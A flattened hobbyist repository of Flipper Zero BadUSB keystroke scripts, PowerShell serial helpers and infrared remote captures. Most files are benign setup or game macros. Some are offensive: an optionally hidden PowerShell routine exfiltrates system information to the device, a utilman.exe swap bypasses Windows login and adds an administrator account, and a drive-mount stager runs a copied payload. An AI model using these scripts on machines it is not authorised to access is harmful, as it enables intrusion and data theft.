4 | 5 | - Run BadUSB script. Powershell will launch and then wait for the specified drive label to mount. 6 | 7 | - Back out of BadUSB app and switch to Mass Storage app and select a disk image with the matching disk label. 8 | 9 | - Once Windows has mounted the drive, it will run the payload. 10 | -------------------------------------------------------------------------------- /badusb/read-from-flipper-disk-image/wait-for-drive-example.txt: -------------------------------------------------------------------------------- 1 | REM Author: emptythevoid 2 | REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup 3 | REM Target: Windows 10, 11 4 | REM Category: PoC 5 | 6 | REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution 7 | REM Powershell will wait until a device with the specified drive label is found. 8 | REM When drive label is mounted, Powershell will launch calc.exe and exit. 9 | 10 | 11 | REM Open Powershell 12 | DELAY 500 13 | GUI r 14 | DELAY 500 15 | 16 | REM Run Powershell by full path to avoid Windows Terminal. 17 | STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe 18 | 19 | DELAY 500 20 | ENTER 21 | DELAY 750 22 | 23 | ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange 24 | 25 | ENTER 26 | 27 | -------------------------------------------------------------------------------- /badusb/read_serial_tests/read_test.ps1: -------------------------------------------------------------------------------- 1 | $port = New-Object System.IO.Ports.SerialPort 2 | $port.PortName = "COM10" 3 | $port.BaudRate = "115200" 4 | $port.Parity = "None" 5 | $port.DataBits = 8 6 | $port.StopBits = 1 7 | $port.ReadTimeout = 9000 # 9 seconds 8 | $port.DTREnable = $True 9 | $port.open() #opens serial connection 10 | 11 | $SPATH="/ext/apps_data/testfile.txt" 12 | $OPATH="C:\users\$env:username\Desktop\outfile.txt" 13 | 14 | echo "attempting to read file" 15 | Start-Sleep -m 500 # wait for CLI 16 | 17 | $port.DiscardInBuffer() 18 | 19 | $port.Write("storage read $SPATH `r`n") 20 | 21 | Start-Sleep -m 500 22 | 23 | $outfile = $port.ReadExisting() 24 | 25 | # formatting output file 26 | 27 | # Removes first two leading blank lines, trailing garbage at the end 28 | $outfileformat = $outfile.split([string[]]"`r`n", [StringSplitOptions]::None) 29 | $outfileformat[2..($outfileformat.length -3)] | Out-File $OPATH 30 | 31 | echo "done" 32 | 33 | $port.close() 34 | 35 | -------------------------------------------------------------------------------- /badusb/read_write_to_mass storage/copy-and-execute-example.txt: -------------------------------------------------------------------------------- 1 | REM Author: emptythevoid 2 | REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup 3 | REM Target: Windows 10, 11 4 | REM Category: PoC 5 | 6 | REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution 7 | REM Powershell will wait until a device with the specified drive label is found. 8 | REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it. 9 | REM disk image in Flipper must have the drive label: flipdisk 10 | 11 | REM Open Powershell 12 | DELAY 500 13 | GUI r 14 | DELAY 500 15 | 16 | STRING powershell 17 | 18 | DELAY 500 19 | ENTER 20 | DELAY 750 21 | 22 | REM $d is the powershell command to run once the flipper disk image is found 23 | STRING $d={$Desktoppath=[environment]::getfolderpath("desktop"); cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;}; 24 | 25 | REM below is the powershell stager to look for a disk label called 'flipdisk'. 26 | REM Powershell will remain open and wait until it sees the disk mount. 27 | REM Once disk is found, command $d from above is executed. 28 | STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;& $d;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange 29 | 30 | ENTER 31 | 32 | -------------------------------------------------------------------------------- /badusb/read_write_to_mass storage/wait-for-drive-example.txt: -------------------------------------------------------------------------------- 1 | REM Author: emptythevoid 2 | REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup 3 | REM Target: Windows 10, 11 4 | REM Category: PoC 5 | 6 | REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution 7 | REM Powershell will wait until a device with the specified drive label is found. 8 | REM When drive label is mounted, Powershell will launch calc.exe and exit. 9 | 10 | 11 | REM Open Powershell 12 | DELAY 500 13 | GUI r 14 | DELAY 500 15 | 16 | REM Run Powershell by full path to avoid Windows Terminal. 17 | STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe 18 | 19 | DELAY 500 20 | ENTER 21 | DELAY 750 22 | 23 | ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange 24 | 25 | ENTER 26 | 27 | -------------------------------------------------------------------------------- /badusb/red_dead_redemption_2/Five_Finger_Filet.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/badusb/red_dead_redemption_2/Five_Finger_Filet.zip -------------------------------------------------------------------------------- /badusb/red_dead_redemption_2/rdonline_sololobby_linux.txt: -------------------------------------------------------------------------------- 1 | REM pause the RDR2 process while in Online to force a solo lobby on Linux 2 | REM Author: emptythevoid 3 | 4 | REM Open Terminal - change this depending on your distro 5 | CTRL-ALT T 6 | 7 | DELAY 300 8 | 9 | 10 | REM get PID of RDR2 11 | STRING PID=$(pgrep RDR2.exe) 12 | ENTER 13 | DELAY 100 14 | 15 | REM pause 16 | STRING kill -s SIGSTOP $PID 17 | ENTER 18 | 19 | REM How long to wait. 7 seconds should work 20 | DELAY 7000 21 | 22 | REM continue process 23 | STRING kill -s SIGCONT $PID 24 | ENTER 25 | DELAY 100 26 | 27 | REM exit terminal 28 | STRING exit 29 | ENTER 30 | 31 | -------------------------------------------------------------------------------- /badusb/red_dead_redemption_2/rdr2_craft_ammo/README.md: -------------------------------------------------------------------------------- 1 | For Red Dead Redemption 2 on PC 2 | 3 | Works as a macro to hold down the button that lets the player craft ammo. This is especially useful for split bullets. 4 | -------------------------------------------------------------------------------- /badusb/red_dead_redemption_2/rdr2_craft_ammo/rdr2_craft_ammo.txt: -------------------------------------------------------------------------------- 1 | REM Use BadUSB to hold down the button (Enter) to make split bullets in RDR2 for 500 seconds (a little over 8 minutes) 2 | 3 | HOLD ENTER 4 | DELAY 500000 5 | -------------------------------------------------------------------------------- /badusb/save_to_flipper_poc/save_to_flipper_fast.txt: -------------------------------------------------------------------------------- 1 | REM Title: Save To Flipper PoC 2 | REM Author: emptythevoid and LupusE 3 | REM Target: Windows 10 (not tested on Windows 11, yet) 4 | REM Version: 1.0 5 | REM Category: PoC 6 | 7 | REM Open Powershell 8 | DELAY 500 9 | GUI r 10 | DELAY 500 11 | 12 | REM Optionally run powershell hidden 13 | REM STRING powershell -w h 14 | 15 | REM Comment out the below line if you're using the optional hidden window above 16 | STRING powershell 17 | 18 | DELAY 500 19 | ENTER 20 | DELAY 750 21 | 22 | REM The powershell starts with a delay. This is to give you time to hit BACK twice on the Flipper to get it out of BadUSB mode. Otherwise it wont save data. 23 | REM If the normal FZ mode is detected, the script will determine which COM port the Flipper is plugged in and write a string to the specified path/file. 24 | 25 | REM ## Command to execute/data to extract. Don't forget cast to string. 26 | ALTSTRING $d=(Get-ComputerInfo|Out-String); 27 | 28 | REM ## The VendorID and ProductID to search. If you'd change the BadUSB IDs in this script, you need to change $BHID as well. 29 | ALTSTRING $BHID="HID\\VID_046D\&PID_C529"; 30 | ALTSTRING $SUSB="USB\\VID_0483\&PID_5740"; 31 | REM Teh trorage Path where the result is SPATHed at the Flipper Zero SD card 32 | ALTSTRING $SPATH="/ext/apps_data/exfil_data" 33 | ENTER 34 | 35 | DELAY 1000 36 | REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec. 37 | ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID}){"BadUSB"}Else{"NoFZ";Start-Sleep 4};Start-Sleep 1}} 38 | REM ## Shorter Version, without debug output, no 4 Sec delay, exits powershell upon completion (useful when using powershell -w h) 39 | REM ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};exit 40 | 41 | ENTER 42 | -------------------------------------------------------------------------------- /badusb/win10_install/README.md: -------------------------------------------------------------------------------- 1 | Ducky scripts for the Flipper to automate the GUI for installing Windows 10 Pro, 22H2. Emphasis is on automation, not efficiency (longer delays than necessary) 2 | 3 | Part 1 handles the intial setup, including removing any existing partitions and letting Windows create a new scheme. 4 | 5 | Part 2 Handles the rest of the setup. It is configured to *always* click "I don't have internet", as trying to get Ducky Script to select the correct Wifi SSID from the list is unpredictable. NOTE: you have to choose in the script which version to run - the one where you have no wifi at all, or the one where you have wifi and at least one access point will show up when it scans for access points. This part also handles creation of the initial local user account. Make sure to fill in the STRINGs that contain the information required: User, Password, and three security answers (the script assumes these aren't important so it always selects the first one from the drop down - adjust as you desire) 6 | 7 | Notes about timing: The script implicitly assumes that your computer is relatively fast with an SSD/NVME drive. If the timing is wrong, most commands will accidentally turn on voice assistant. That said, take care when the account is created. If it goes too quickly, it's possible that your password could be added as a user account! 8 | 9 | TODO: 10 | 11 | -Need to add optional code block for when Ethernet and/or Wifi is available (currently it operates under the assumption that internet isn't available) 12 | 13 | -Probably need to set a standard longer delay for part 2, since so many Delay 100 is needed 14 | -------------------------------------------------------------------------------- /badusb/win10_install/win10_part1.txt: -------------------------------------------------------------------------------- 1 | REM Automate the first part of Windows 10 install. 2 | 3 | REM Target: Windows 10 Pro 22H2 4 | 5 | REM Emphasis is on automating the procedure, not efficiency (longer than necessary delays) 6 | REM Start at the Language selection screen 7 | 8 | REM Enter language and click Next. Assume defaults. 9 | TAB 10 | TAB 11 | TAB 12 | ENTER 13 | DELAY 100 14 | 15 | REM Click Install Now 16 | ENTER 17 | DELAY 20000 18 | 19 | REM Windows license 20 | SPACE 21 | TAB 22 | ENTER 23 | DELAY 100 24 | 25 | REM Type of install = Custom 26 | TAB 27 | ENTER 28 | DELAY 500 29 | 30 | REM Remove all partitions and start fresh 31 | REM Note: If default partitions are absent, it still creates the partitions and completes 32 | REM Defaults to "Primary" 33 | TAB 34 | TAB 35 | ENTER 36 | DELAY 100 37 | LEFT 38 | ENTER 39 | DELAY 500 40 | REM Now at System 41 | TAB 42 | TAB 43 | ENTER 44 | DELAY 100 45 | LEFT 46 | ENTER 47 | DELAY 500 48 | REM Now at "unallocated" 49 | DOWN 50 | REM now at "MSR" 51 | TAB 52 | TAB 53 | ENTER 54 | DELAY 100 55 | LEFT 56 | ENTER 57 | DELAY 500 58 | REM back at "unallocated" 59 | DOWN 60 | REM now at "recovery" 61 | TAB 62 | TAB 63 | ENTER 64 | DELAY 100 65 | LEFT 66 | ENTER 67 | DELAY 15000 68 | REM now at 100% unallocated. Click New 69 | TAB 70 | TAB 71 | ENTER 72 | DELAY 100 73 | REM use all space (default) 74 | TAB 75 | ENTER 76 | DELAY 100 77 | REM notice about additional partitions 78 | ENTER 79 | DELAY 5000 80 | REM press Next 81 | TAB 82 | TAB 83 | TAB 84 | TAB 85 | TAB 86 | ENTER 87 | -------------------------------------------------------------------------------- /badusb/win11_24h2_install/readme.md: -------------------------------------------------------------------------------- 1 | Updated BadUSB scripts for installing Windows 11 24H2 from ISO 2 | 3 | The installation scripts come in three parts that need to be run in order. 4 | 5 | win11_24h2_part_1 clears out the primary disk 0, then reboots. It removes ALL DATA. This is required so that we don't have to fiddle with deleting each partition manually in part 2. 6 | 7 | win11_24h2_part_2 performs the initial Windows 11 installation to disk 0, then reboots. 8 | 9 | win11_24h2_part_3 Creates a new local administrator account (that you need to set up into the script) and bypasses all the out-of-box experience crap. 10 | -------------------------------------------------------------------------------- /badusb/win11_24h2_install/win11_24h2_part_1_clear_disk_partitions.txt: -------------------------------------------------------------------------------- 1 | REM Pre-stage Windows 24H2 by clearing out all partitions on primary drive (Disk 0) 2 | 3 | SHIFT F10 4 | DELAY 1000 5 | 6 | REM CTRL-ALT TAB 7 | 8 | RIGHT ARROW 9 | DELAY 100 10 | ENTER 11 | 12 | REM remove partitions on disk 0 13 | STRING diskpart 14 | ENTER 15 | DELAY 1000 16 | 17 | STRING select disk 0 18 | ENTER 19 | DELAY 1000 20 | 21 | STRING clean 22 | ENTER 23 | DELAY 5000 24 | 25 | REM leave command prompt 26 | ALT F4 27 | DELAY 1000 28 | ALT TAB 29 | DELAY 1000 30 | 31 | REM reboot 32 | ALT F4 33 | DELAY 1000 34 | ALT Y 35 | -------------------------------------------------------------------------------- /badusb/win11_24h2_install/win11_24h2_part_2_install.txt: -------------------------------------------------------------------------------- 1 | REM Updated Windows 11 24H2 ISO installer script 2 | REM This script assumes that you ran the pre-install script to clear out disk 0 3 | REM so we don't have to navigate deleting each partition 4 | 5 | ENTER 6 | DELAY 1000 7 | ENTER 8 | DELAY 1000 9 | ALT A 10 | DELAY 1000 11 | ENTER 12 | DELAY 10000 13 | ALT A 14 | 15 | REM Wait for disk search to complete 16 | DELAY 20000 17 | 18 | REM create new partition(s) 19 | ALT N 20 | DELAY 15000 21 | 22 | REM begin install 23 | ALT I 24 | -------------------------------------------------------------------------------- /badusb/win11_install/oobe_bypass_part1.txt: -------------------------------------------------------------------------------- 1 | REM enable the OOBE bypass to allow local account on windows 11 2 | REM This file will enable the bypass and reboot the computer 3 | 4 | SHIFT F10 5 | DELAY 1000 6 | HOLD ALT 7 | DELAY 1000 8 | HOLD TAB 9 | DELAY 500 10 | RIGHT 11 | DELAY 200 12 | RELEASE TAB 13 | DELAY 500 14 | RELEASE ALT 15 | DELAY 1000 16 | SHIFT F10 17 | DELAY 1000 18 | HOLD ALT 19 | DELAY 1000 20 | HOLD TAB 21 | DELAY 500 22 | RIGHT 23 | DELAY 200 24 | RELEASE TAB 25 | DELAY 500 26 | RELEASE ALT 27 | DELAY 1000 28 | STRING OOBE\BYPASSNRO 29 | DELAY 1000 30 | ENTER 31 | -------------------------------------------------------------------------------- /badusb/win11_install/oobe_bypass_part2.txt: -------------------------------------------------------------------------------- 1 | REM enable the OOBE bypass to allow local account on windows 11 2 | REM This is an optional second step, that will release DHCP addresses. 3 | REM Use this after the computer has rebooted from part 1 4 | 5 | SHIFT F10 6 | DELAY 1000 7 | HOLD ALT 8 | DELAY 1000 9 | HOLD TAB 10 | DELAY 500 11 | RIGHT 12 | DELAY 200 13 | RELEASE TAB 14 | DELAY 500 15 | RELEASE ALT 16 | DELAY 1000 17 | SHIFT F10 18 | DELAY 1000 19 | HOLD ALT 20 | DELAY 1000 21 | HOLD TAB 22 | DELAY 500 23 | RIGHT 24 | DELAY 200 25 | RELEASE TAB 26 | DELAY 500 27 | RELEASE ALT 28 | DELAY 1000 29 | STRING ipconfig /release 30 | ENTER 31 | DELAY 5000 32 | STRING EXIT 33 | ENTER 34 | -------------------------------------------------------------------------------- /badusb/win11_install/readme.md: -------------------------------------------------------------------------------- 1 | Updated 11/4/24: 2 | 3 | Use the win11_newaccount_oobe script during Windows 11 setup. This allows you to bypass the (Microsoft) account creation headache and specify your own local admin user and password. 4 | 5 | ------------------------ 6 | 7 | Windows 11 installer helpers. You must use these with a fresh Windows 11 ISO installer on a USB boot drive. 8 | 9 | These will likely fail to work as expected when the computer is set up with an OEM install. 10 | 11 | These come in two parts: 12 | 13 | Part 1- Handles the initial setup of wiping out any existing partitions, setting up the disk, and installing Windows. No customization is needed here. 14 | 15 | Part 2- Handles the "setup" after install. You need to modify a few things for your setup: 16 | 17 | youruser 18 | 19 | yourpassword 20 | 21 | security 1 22 | 23 | security 2 24 | 25 | security 3 26 | 27 | It is highly recommended NOT to have your computer connected to Ethernet when you perform the installation, otherwise it will perform updates and try to make you use a Microsoft account. 28 | 29 | If, however, Ethernet is plugged in, Part 2 will release the DHCP IP address before setup. Once the setup is complete, Flipper will PAUSE and wait for a button press. Perform this after the computer is safely at the desktop. This will renew the IP configuration. 30 | 31 | The OOBE bypass scripts are likely not needed and obsolete. 32 | -------------------------------------------------------------------------------- /badusb/win11_install/win11_install_part1.txt: -------------------------------------------------------------------------------- 1 | REM Handle first phase of Windows 11 installation, 22H2, 23H2 2 | 3 | REM Author: emptythevoid 4 | 5 | REM Next 6 | ALT y 7 | 8 | DELAY 100 9 | 10 | REM Install Now 11 | ENTER 12 | 13 | DELAY 20000 14 | 15 | REM License 16 | SPACE 17 | 18 | ALT n 19 | DELAY 2000 20 | 21 | REM Type of Installation - Custom 22 | 23 | ALT c 24 | DELAY 1000 25 | 26 | REM Delete any and all partitions 27 | REM should be able to simply repeate this over and over after the fisrt one 28 | REM as soon as all are gone, the command will trigger the Next button 29 | REM and begin installation 30 | 31 | ALT d 32 | DELAY 200 33 | TAB 34 | ENTER 35 | DELAY 2000 36 | 37 | REM repeat the blocks below for however many partitions you think you'll need to remove 38 | 39 | DOWN 40 | ALT d 41 | DELAY 200 42 | TAB 43 | ENTER 44 | DELAY 2000 45 | 46 | DOWN 47 | ALT d 48 | DELAY 200 49 | TAB 50 | ENTER 51 | DELAY 200 52 | 53 | DOWN 54 | ALT d 55 | DELAY 200 56 | TAB 57 | ENTER 58 | DELAY 2000 59 | 60 | DOWN 61 | ALT d 62 | DELAY 200 63 | TAB 64 | ENTER 65 | DELAY 2000 66 | 67 | DOWN 68 | ALT d 69 | DELAY 200 70 | TAB 71 | ENTER 72 | DELAY 2000 73 | 74 | REM one up arrow partition removal, for safety 75 | UP 76 | ALT d 77 | DELAY 200 78 | TAB 79 | ENTER 80 | DELAY 2000 81 | 82 | 83 | REM Assume that NO partitions exist. 84 | ALT n 85 | -------------------------------------------------------------------------------- /badusb/windows_helpers/README.md: -------------------------------------------------------------------------------- 1 | Helper BadUSB scripts for Windows. 2 | -------------------------------------------------------------------------------- /badusb/windows_helpers/check_for_updates_win10.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | 3 | GUI S 4 | DELAY 500 5 | STRING check for updates 6 | DELAY 1000 7 | ENTER 8 | DELAY 5000 9 | TAB 10 | TAB 11 | SPACE 12 | -------------------------------------------------------------------------------- /badusb/windows_helpers/check_for_updates_win11.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | 3 | GUI S 4 | DELAY 500 5 | STRING check for updates 6 | DELAY 1000 7 | ENTER 8 | DELAY 5000 9 | TAB 10 | TAB 11 | TAB 12 | SPACE 13 | -------------------------------------------------------------------------------- /badusb/windows_helpers/ipconfig_renew.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | GUI R 3 | DELAY 500 4 | STRING cmd 5 | ENTER 6 | DELAY 1000 7 | STRING ipconfig /renew 8 | DELAY 200 9 | ENTER 10 | DELAY 5000 11 | STRING exit 12 | DELAY 200 13 | ENTER 14 | -------------------------------------------------------------------------------- /badusb/windows_helpers/shutdown_commandline.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | GUI R 3 | DELAY 500 4 | REM STRING shutdown /s /t 0 5 | STRING shutdown /p 6 | DELAY 100 7 | ENTER 8 | 9 | REM Handle apps preventing computer from shutting down 10 | DELAY 20000 11 | SHIFT TAB 12 | ENTER 13 | -------------------------------------------------------------------------------- /badusb/windows_helpers/windows_eastern_timezone.txt: -------------------------------------------------------------------------------- 1 | REM set timezone to Eastern 2 | DELAY 500 3 | GUI R 4 | DELAY 500 5 | STRING cmd 6 | DELAY 100 7 | ENTER 8 | DELAY 2000 9 | 10 | ALTSTRING tzutil /s "Eastern Standard Time" 11 | ENTER 12 | 13 | DELAY 300 14 | 15 | ALTSTRING exit 16 | ENTER 17 | -------------------------------------------------------------------------------- /badusb/windows_login_bypass_utilman/readme.md: -------------------------------------------------------------------------------- 1 | Two scripts to perform the utilman.exe -> cmd.exe trick when using a Windows boot media. 2 | 3 | Part 1 is to be used while booted from the USB media. Run it at the Install screen. 4 | 5 | Part 2 is used after utilman.exe has been renamed, and is used to create a new admin account at the login screen, 6 | utilizing the utilman.exe switcheroo set up in Part 1. 7 | 8 | Note, this trick will not work if Bitlocker is enabled. 9 | -------------------------------------------------------------------------------- /badusb/windows_login_bypass_utilman/win_login_bypass_pt1.txt: -------------------------------------------------------------------------------- 1 | REM Bypass Windows login using Windows boot media. 2 | REM This automates the commands used to rename the utilman.exe file to cmd.exe 3 | 4 | REM Author: emptythevoid 5 | 6 | REM Does not work if C: has full drive encryption enabled 7 | 8 | REM Run this when you see the first install screen 9 | 10 | REM == Bring up Terminal ===================== 11 | SHIFT F10 12 | DELAY 1000 13 | 14 | REM == Change directory to system32: 15 | STRING C: 16 | ENTER 17 | DELAY 100 18 | STRING cd c:\windows\system32\ 19 | ENTER 20 | DELAY 1000 21 | 22 | REM == Rename utilman.exe 23 | REM == By default, Windows will be on C: 24 | REM == Change the command below as needed 25 | STRING ren utilman.exe utilman2.exe 26 | ENTER 27 | DELAY 1000 28 | 29 | REM == Copy the cmd.exe into utilman.exe 30 | STRING copy cmd.exe utilman.exe 31 | ENTER 32 | DELAY 1000 33 | 34 | REM == Reboot 35 | STRING shutdown /r /t 0 36 | ENTER 37 | -------------------------------------------------------------------------------- /badusb/windows_login_bypass_utilman/win_login_bypass_pt2.txt: -------------------------------------------------------------------------------- 1 | REM Bypass Windows Login - second phase 2 | 3 | REM Author: emptythevoid 4 | 5 | REM change the net user username and password below as needed 6 | 7 | REM Run this immediately at login. Press nothing else on the computer 8 | 9 | REM try to wake the screen 10 | CTRL-ALT DEL 11 | DELAY 3000 12 | 13 | GUI u 14 | DELAY 2000 15 | 16 | REM should be at the cmd.exe now 17 | 18 | REM create our new user and add them to the administrators group 19 | 20 | STRING net user mrrobot password123! /add 21 | ENTER 22 | 23 | DELAY 500 24 | 25 | STRING net localgroup administrators mrrobot /add 26 | ENTER 27 | 28 | DELAY 500 29 | 30 | REM switch to new user here 31 | REM the other user won't immediately be visible from the user selection on the left. 32 | REM it *will* appear if the screen is allowed to go to sleep 33 | REM to force this, run tsdiscon.exe, but this doesn't work on Windows Home (the file isn't available) 34 | 35 | STRING tsdiscon.exe 36 | ENTER 37 | 38 | DELAY 500 39 | 40 | REM close the terminal 41 | ALT F4 42 | 43 | DELAY 1000 44 | 45 | REM is there a way to change the last logged in user, so it's easier to automatically login as them, without having to TAB and hope for the best? 46 | REM https://gist.github.com/dbirks/ec4416c9064a323b14f435ee934efd71?permalink_comment_id=2370507 47 | 48 | REM Optionally, go ahead and login here 49 | TAB 50 | TAB 51 | TAB 52 | ENTER 53 | DELAY 300 54 | STRING password123! 55 | ENTER 56 | 57 | -------------------------------------------------------------------------------- /infrared/Arris Remote/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of an Arris remote for a cable set top box 2 | -------------------------------------------------------------------------------- /infrared/Bose Remote/README.md: -------------------------------------------------------------------------------- 1 | A complete capture of a Bose remote for a Bose 3-2-1 Series II DVD home entertainment system 2 | -------------------------------------------------------------------------------- /infrared/Contemporary_Research/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a mysterious "Contemporary Research" remote. I think this went to a really old, non-digital TV tuner. All the samples are RAW and of varying number of samples, so I have little confidence this will work. But it's the best I could do. 2 | 3 | Partially-tested on a 232-STS Tuner 7/3/2023. Some of the buttons did not respond as expected, so I will be re-doing the capture and trying it again. 4 | -------------------------------------------------------------------------------- /infrared/Direct_TV_RC65/Directv_RC65_Manual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Direct_TV_RC65/Directv_RC65_Manual.pdf -------------------------------------------------------------------------------- /infrared/Direct_TV_RC65/README.md: -------------------------------------------------------------------------------- 1 | A capture of a Direct TV RC65 remote. 2 | 3 | According to the manual (https://www.teacremotes.com/Remotes/Directv_RC65_Manual.pdf), the DirectTV receiver has a 5-digit code that requires pairing with the remote by sliding the mode switch to DirectTV and then pressing Mute and Select until green light under DirectTV flashes twice. Then enter the code using the number pad. If correct, the green light will flash twice. At this point, you should be able to turn off the DirectTV receiver 4 | 5 | I have not located the code this remote is programmed for, so for now this capture is "as-is." 6 | 7 | This will require some further investigation. 8 | 9 | I have omitted any button that is programmed for an actual TV, and not for the DirectTV receiver itself. 10 | 11 | Untested. 12 | -------------------------------------------------------------------------------- /infrared/EIKI CMXA Remote/README.md: -------------------------------------------------------------------------------- 1 | This is a complete capture of a remote for an EIKI projector, remote model CXMA 2 | 3 | (This was captured with the remote's DIP switches 1 2 3 4 all in the ON position) 4 | 5 | Flipper detects the protocol as NECext 6 | 7 | This remote has a built-in mouse cursor. I believe I have a simple capture of it. These functions appear as "Cur_..." buttons. 8 | 9 | All other buttons captured as-labeled 10 | 11 | 7/3/2023: Primary buttons were successfully tested on an EIKI LC-XG210 projector 12 | -------------------------------------------------------------------------------- /infrared/Emerson_Magnavox_Sylvania_FUNAI_N9377/README.md: -------------------------------------------------------------------------------- 1 | Capture of a N9377 remote that should be compatible with some older Emerson, Magnavox, Sylvania, and FUNAI VCR decks. 2 | -------------------------------------------------------------------------------- /infrared/Emerson_NH303UD/README.md: -------------------------------------------------------------------------------- 1 | Full capture. Tested on an Emerson (Funai) LF501EM4 2 | -------------------------------------------------------------------------------- /infrared/Epson Projector Remote 159917600/README.md: -------------------------------------------------------------------------------- 1 | This is a complete (?) capture of an Epson Projector remote model 159917600 2 | 3 | Some of the buttons had multi-functions and I did not have a unit to test functionality with, so that's why I'm not certain if it's a full capture. 4 | 5 | Protocol is NECext 6 | 7 | Untested 8 | -------------------------------------------------------------------------------- /infrared/Evolution_digital_cable_tuner/README.md: -------------------------------------------------------------------------------- 1 | Evolution remote for a digital cable tuner "DTA cable" model DM8-1002-CA Hardware Rev 1.0. Tested successfully. 2 | -------------------------------------------------------------------------------- /infrared/Evolution_digital_cable_tuner/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Evolution_digital_cable_tuner/image.jpeg -------------------------------------------------------------------------------- /infrared/Extron_IR_903/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of an Extron IR 903 remote for an Extron video switcher. 2 | 3 | 7/3/2023: Main switch buttons were successfully tested on an Extron IN1508 switcher. 4 | -------------------------------------------------------------------------------- /infrared/Extron_IR_903/signal-2023-06-22-192626_002.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/infrared/Extron_IR_903/signal-2023-06-22-192626_002.jpeg -------------------------------------------------------------------------------- /infrared/GPX D2816 Remote/README.md: -------------------------------------------------------------------------------- 1 | Complete capture of a GPX D2816 remote to a DVD player 2 | -------------------------------------------------------------------------------- /infrared/Gateway Projector 210/README.md: -------------------------------------------------------------------------------- 1 | Capture of a remote for a Gateway Projector model 210. 2 | 3 | The projector functions are NEC protocol, however there seems to be mouse cursor emulation that uses RAW signals. I could not test these, but the main projector functions were tested successfully. 4 | -------------------------------------------------------------------------------- /infrared/Hasbro_bio_bugs/README.md: -------------------------------------------------------------------------------- 1 | IR commands from the remote of a Hasbro XS.02 B.I.O-Stomper 2 | 3 | Functions are only limitedly tested. 4 | 5 | 6 | -------------------------------------------------------------------------------- /infrared/Hasbro_bio_bugs/biobug_stomper.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Training 5 | type: raw 6 | frequency: 38000 7 | duty_cycle: 0.330000 8 | data: 2911 1094 1092 1034 1092 1036 1090 1072 1960 1079 1091 1035 1091 1044 1988 1087 1963 9 | # 10 | name: Skill_stop 11 | type: raw 12 | frequency: 38000 13 | duty_cycle: 0.330000 14 | data: 2913 1104 1987 1087 1988 1087 1988 1079 1064 1061 1065 1061 1065 1070 1989 1086 1964 15 | # 16 | name: Left 17 | 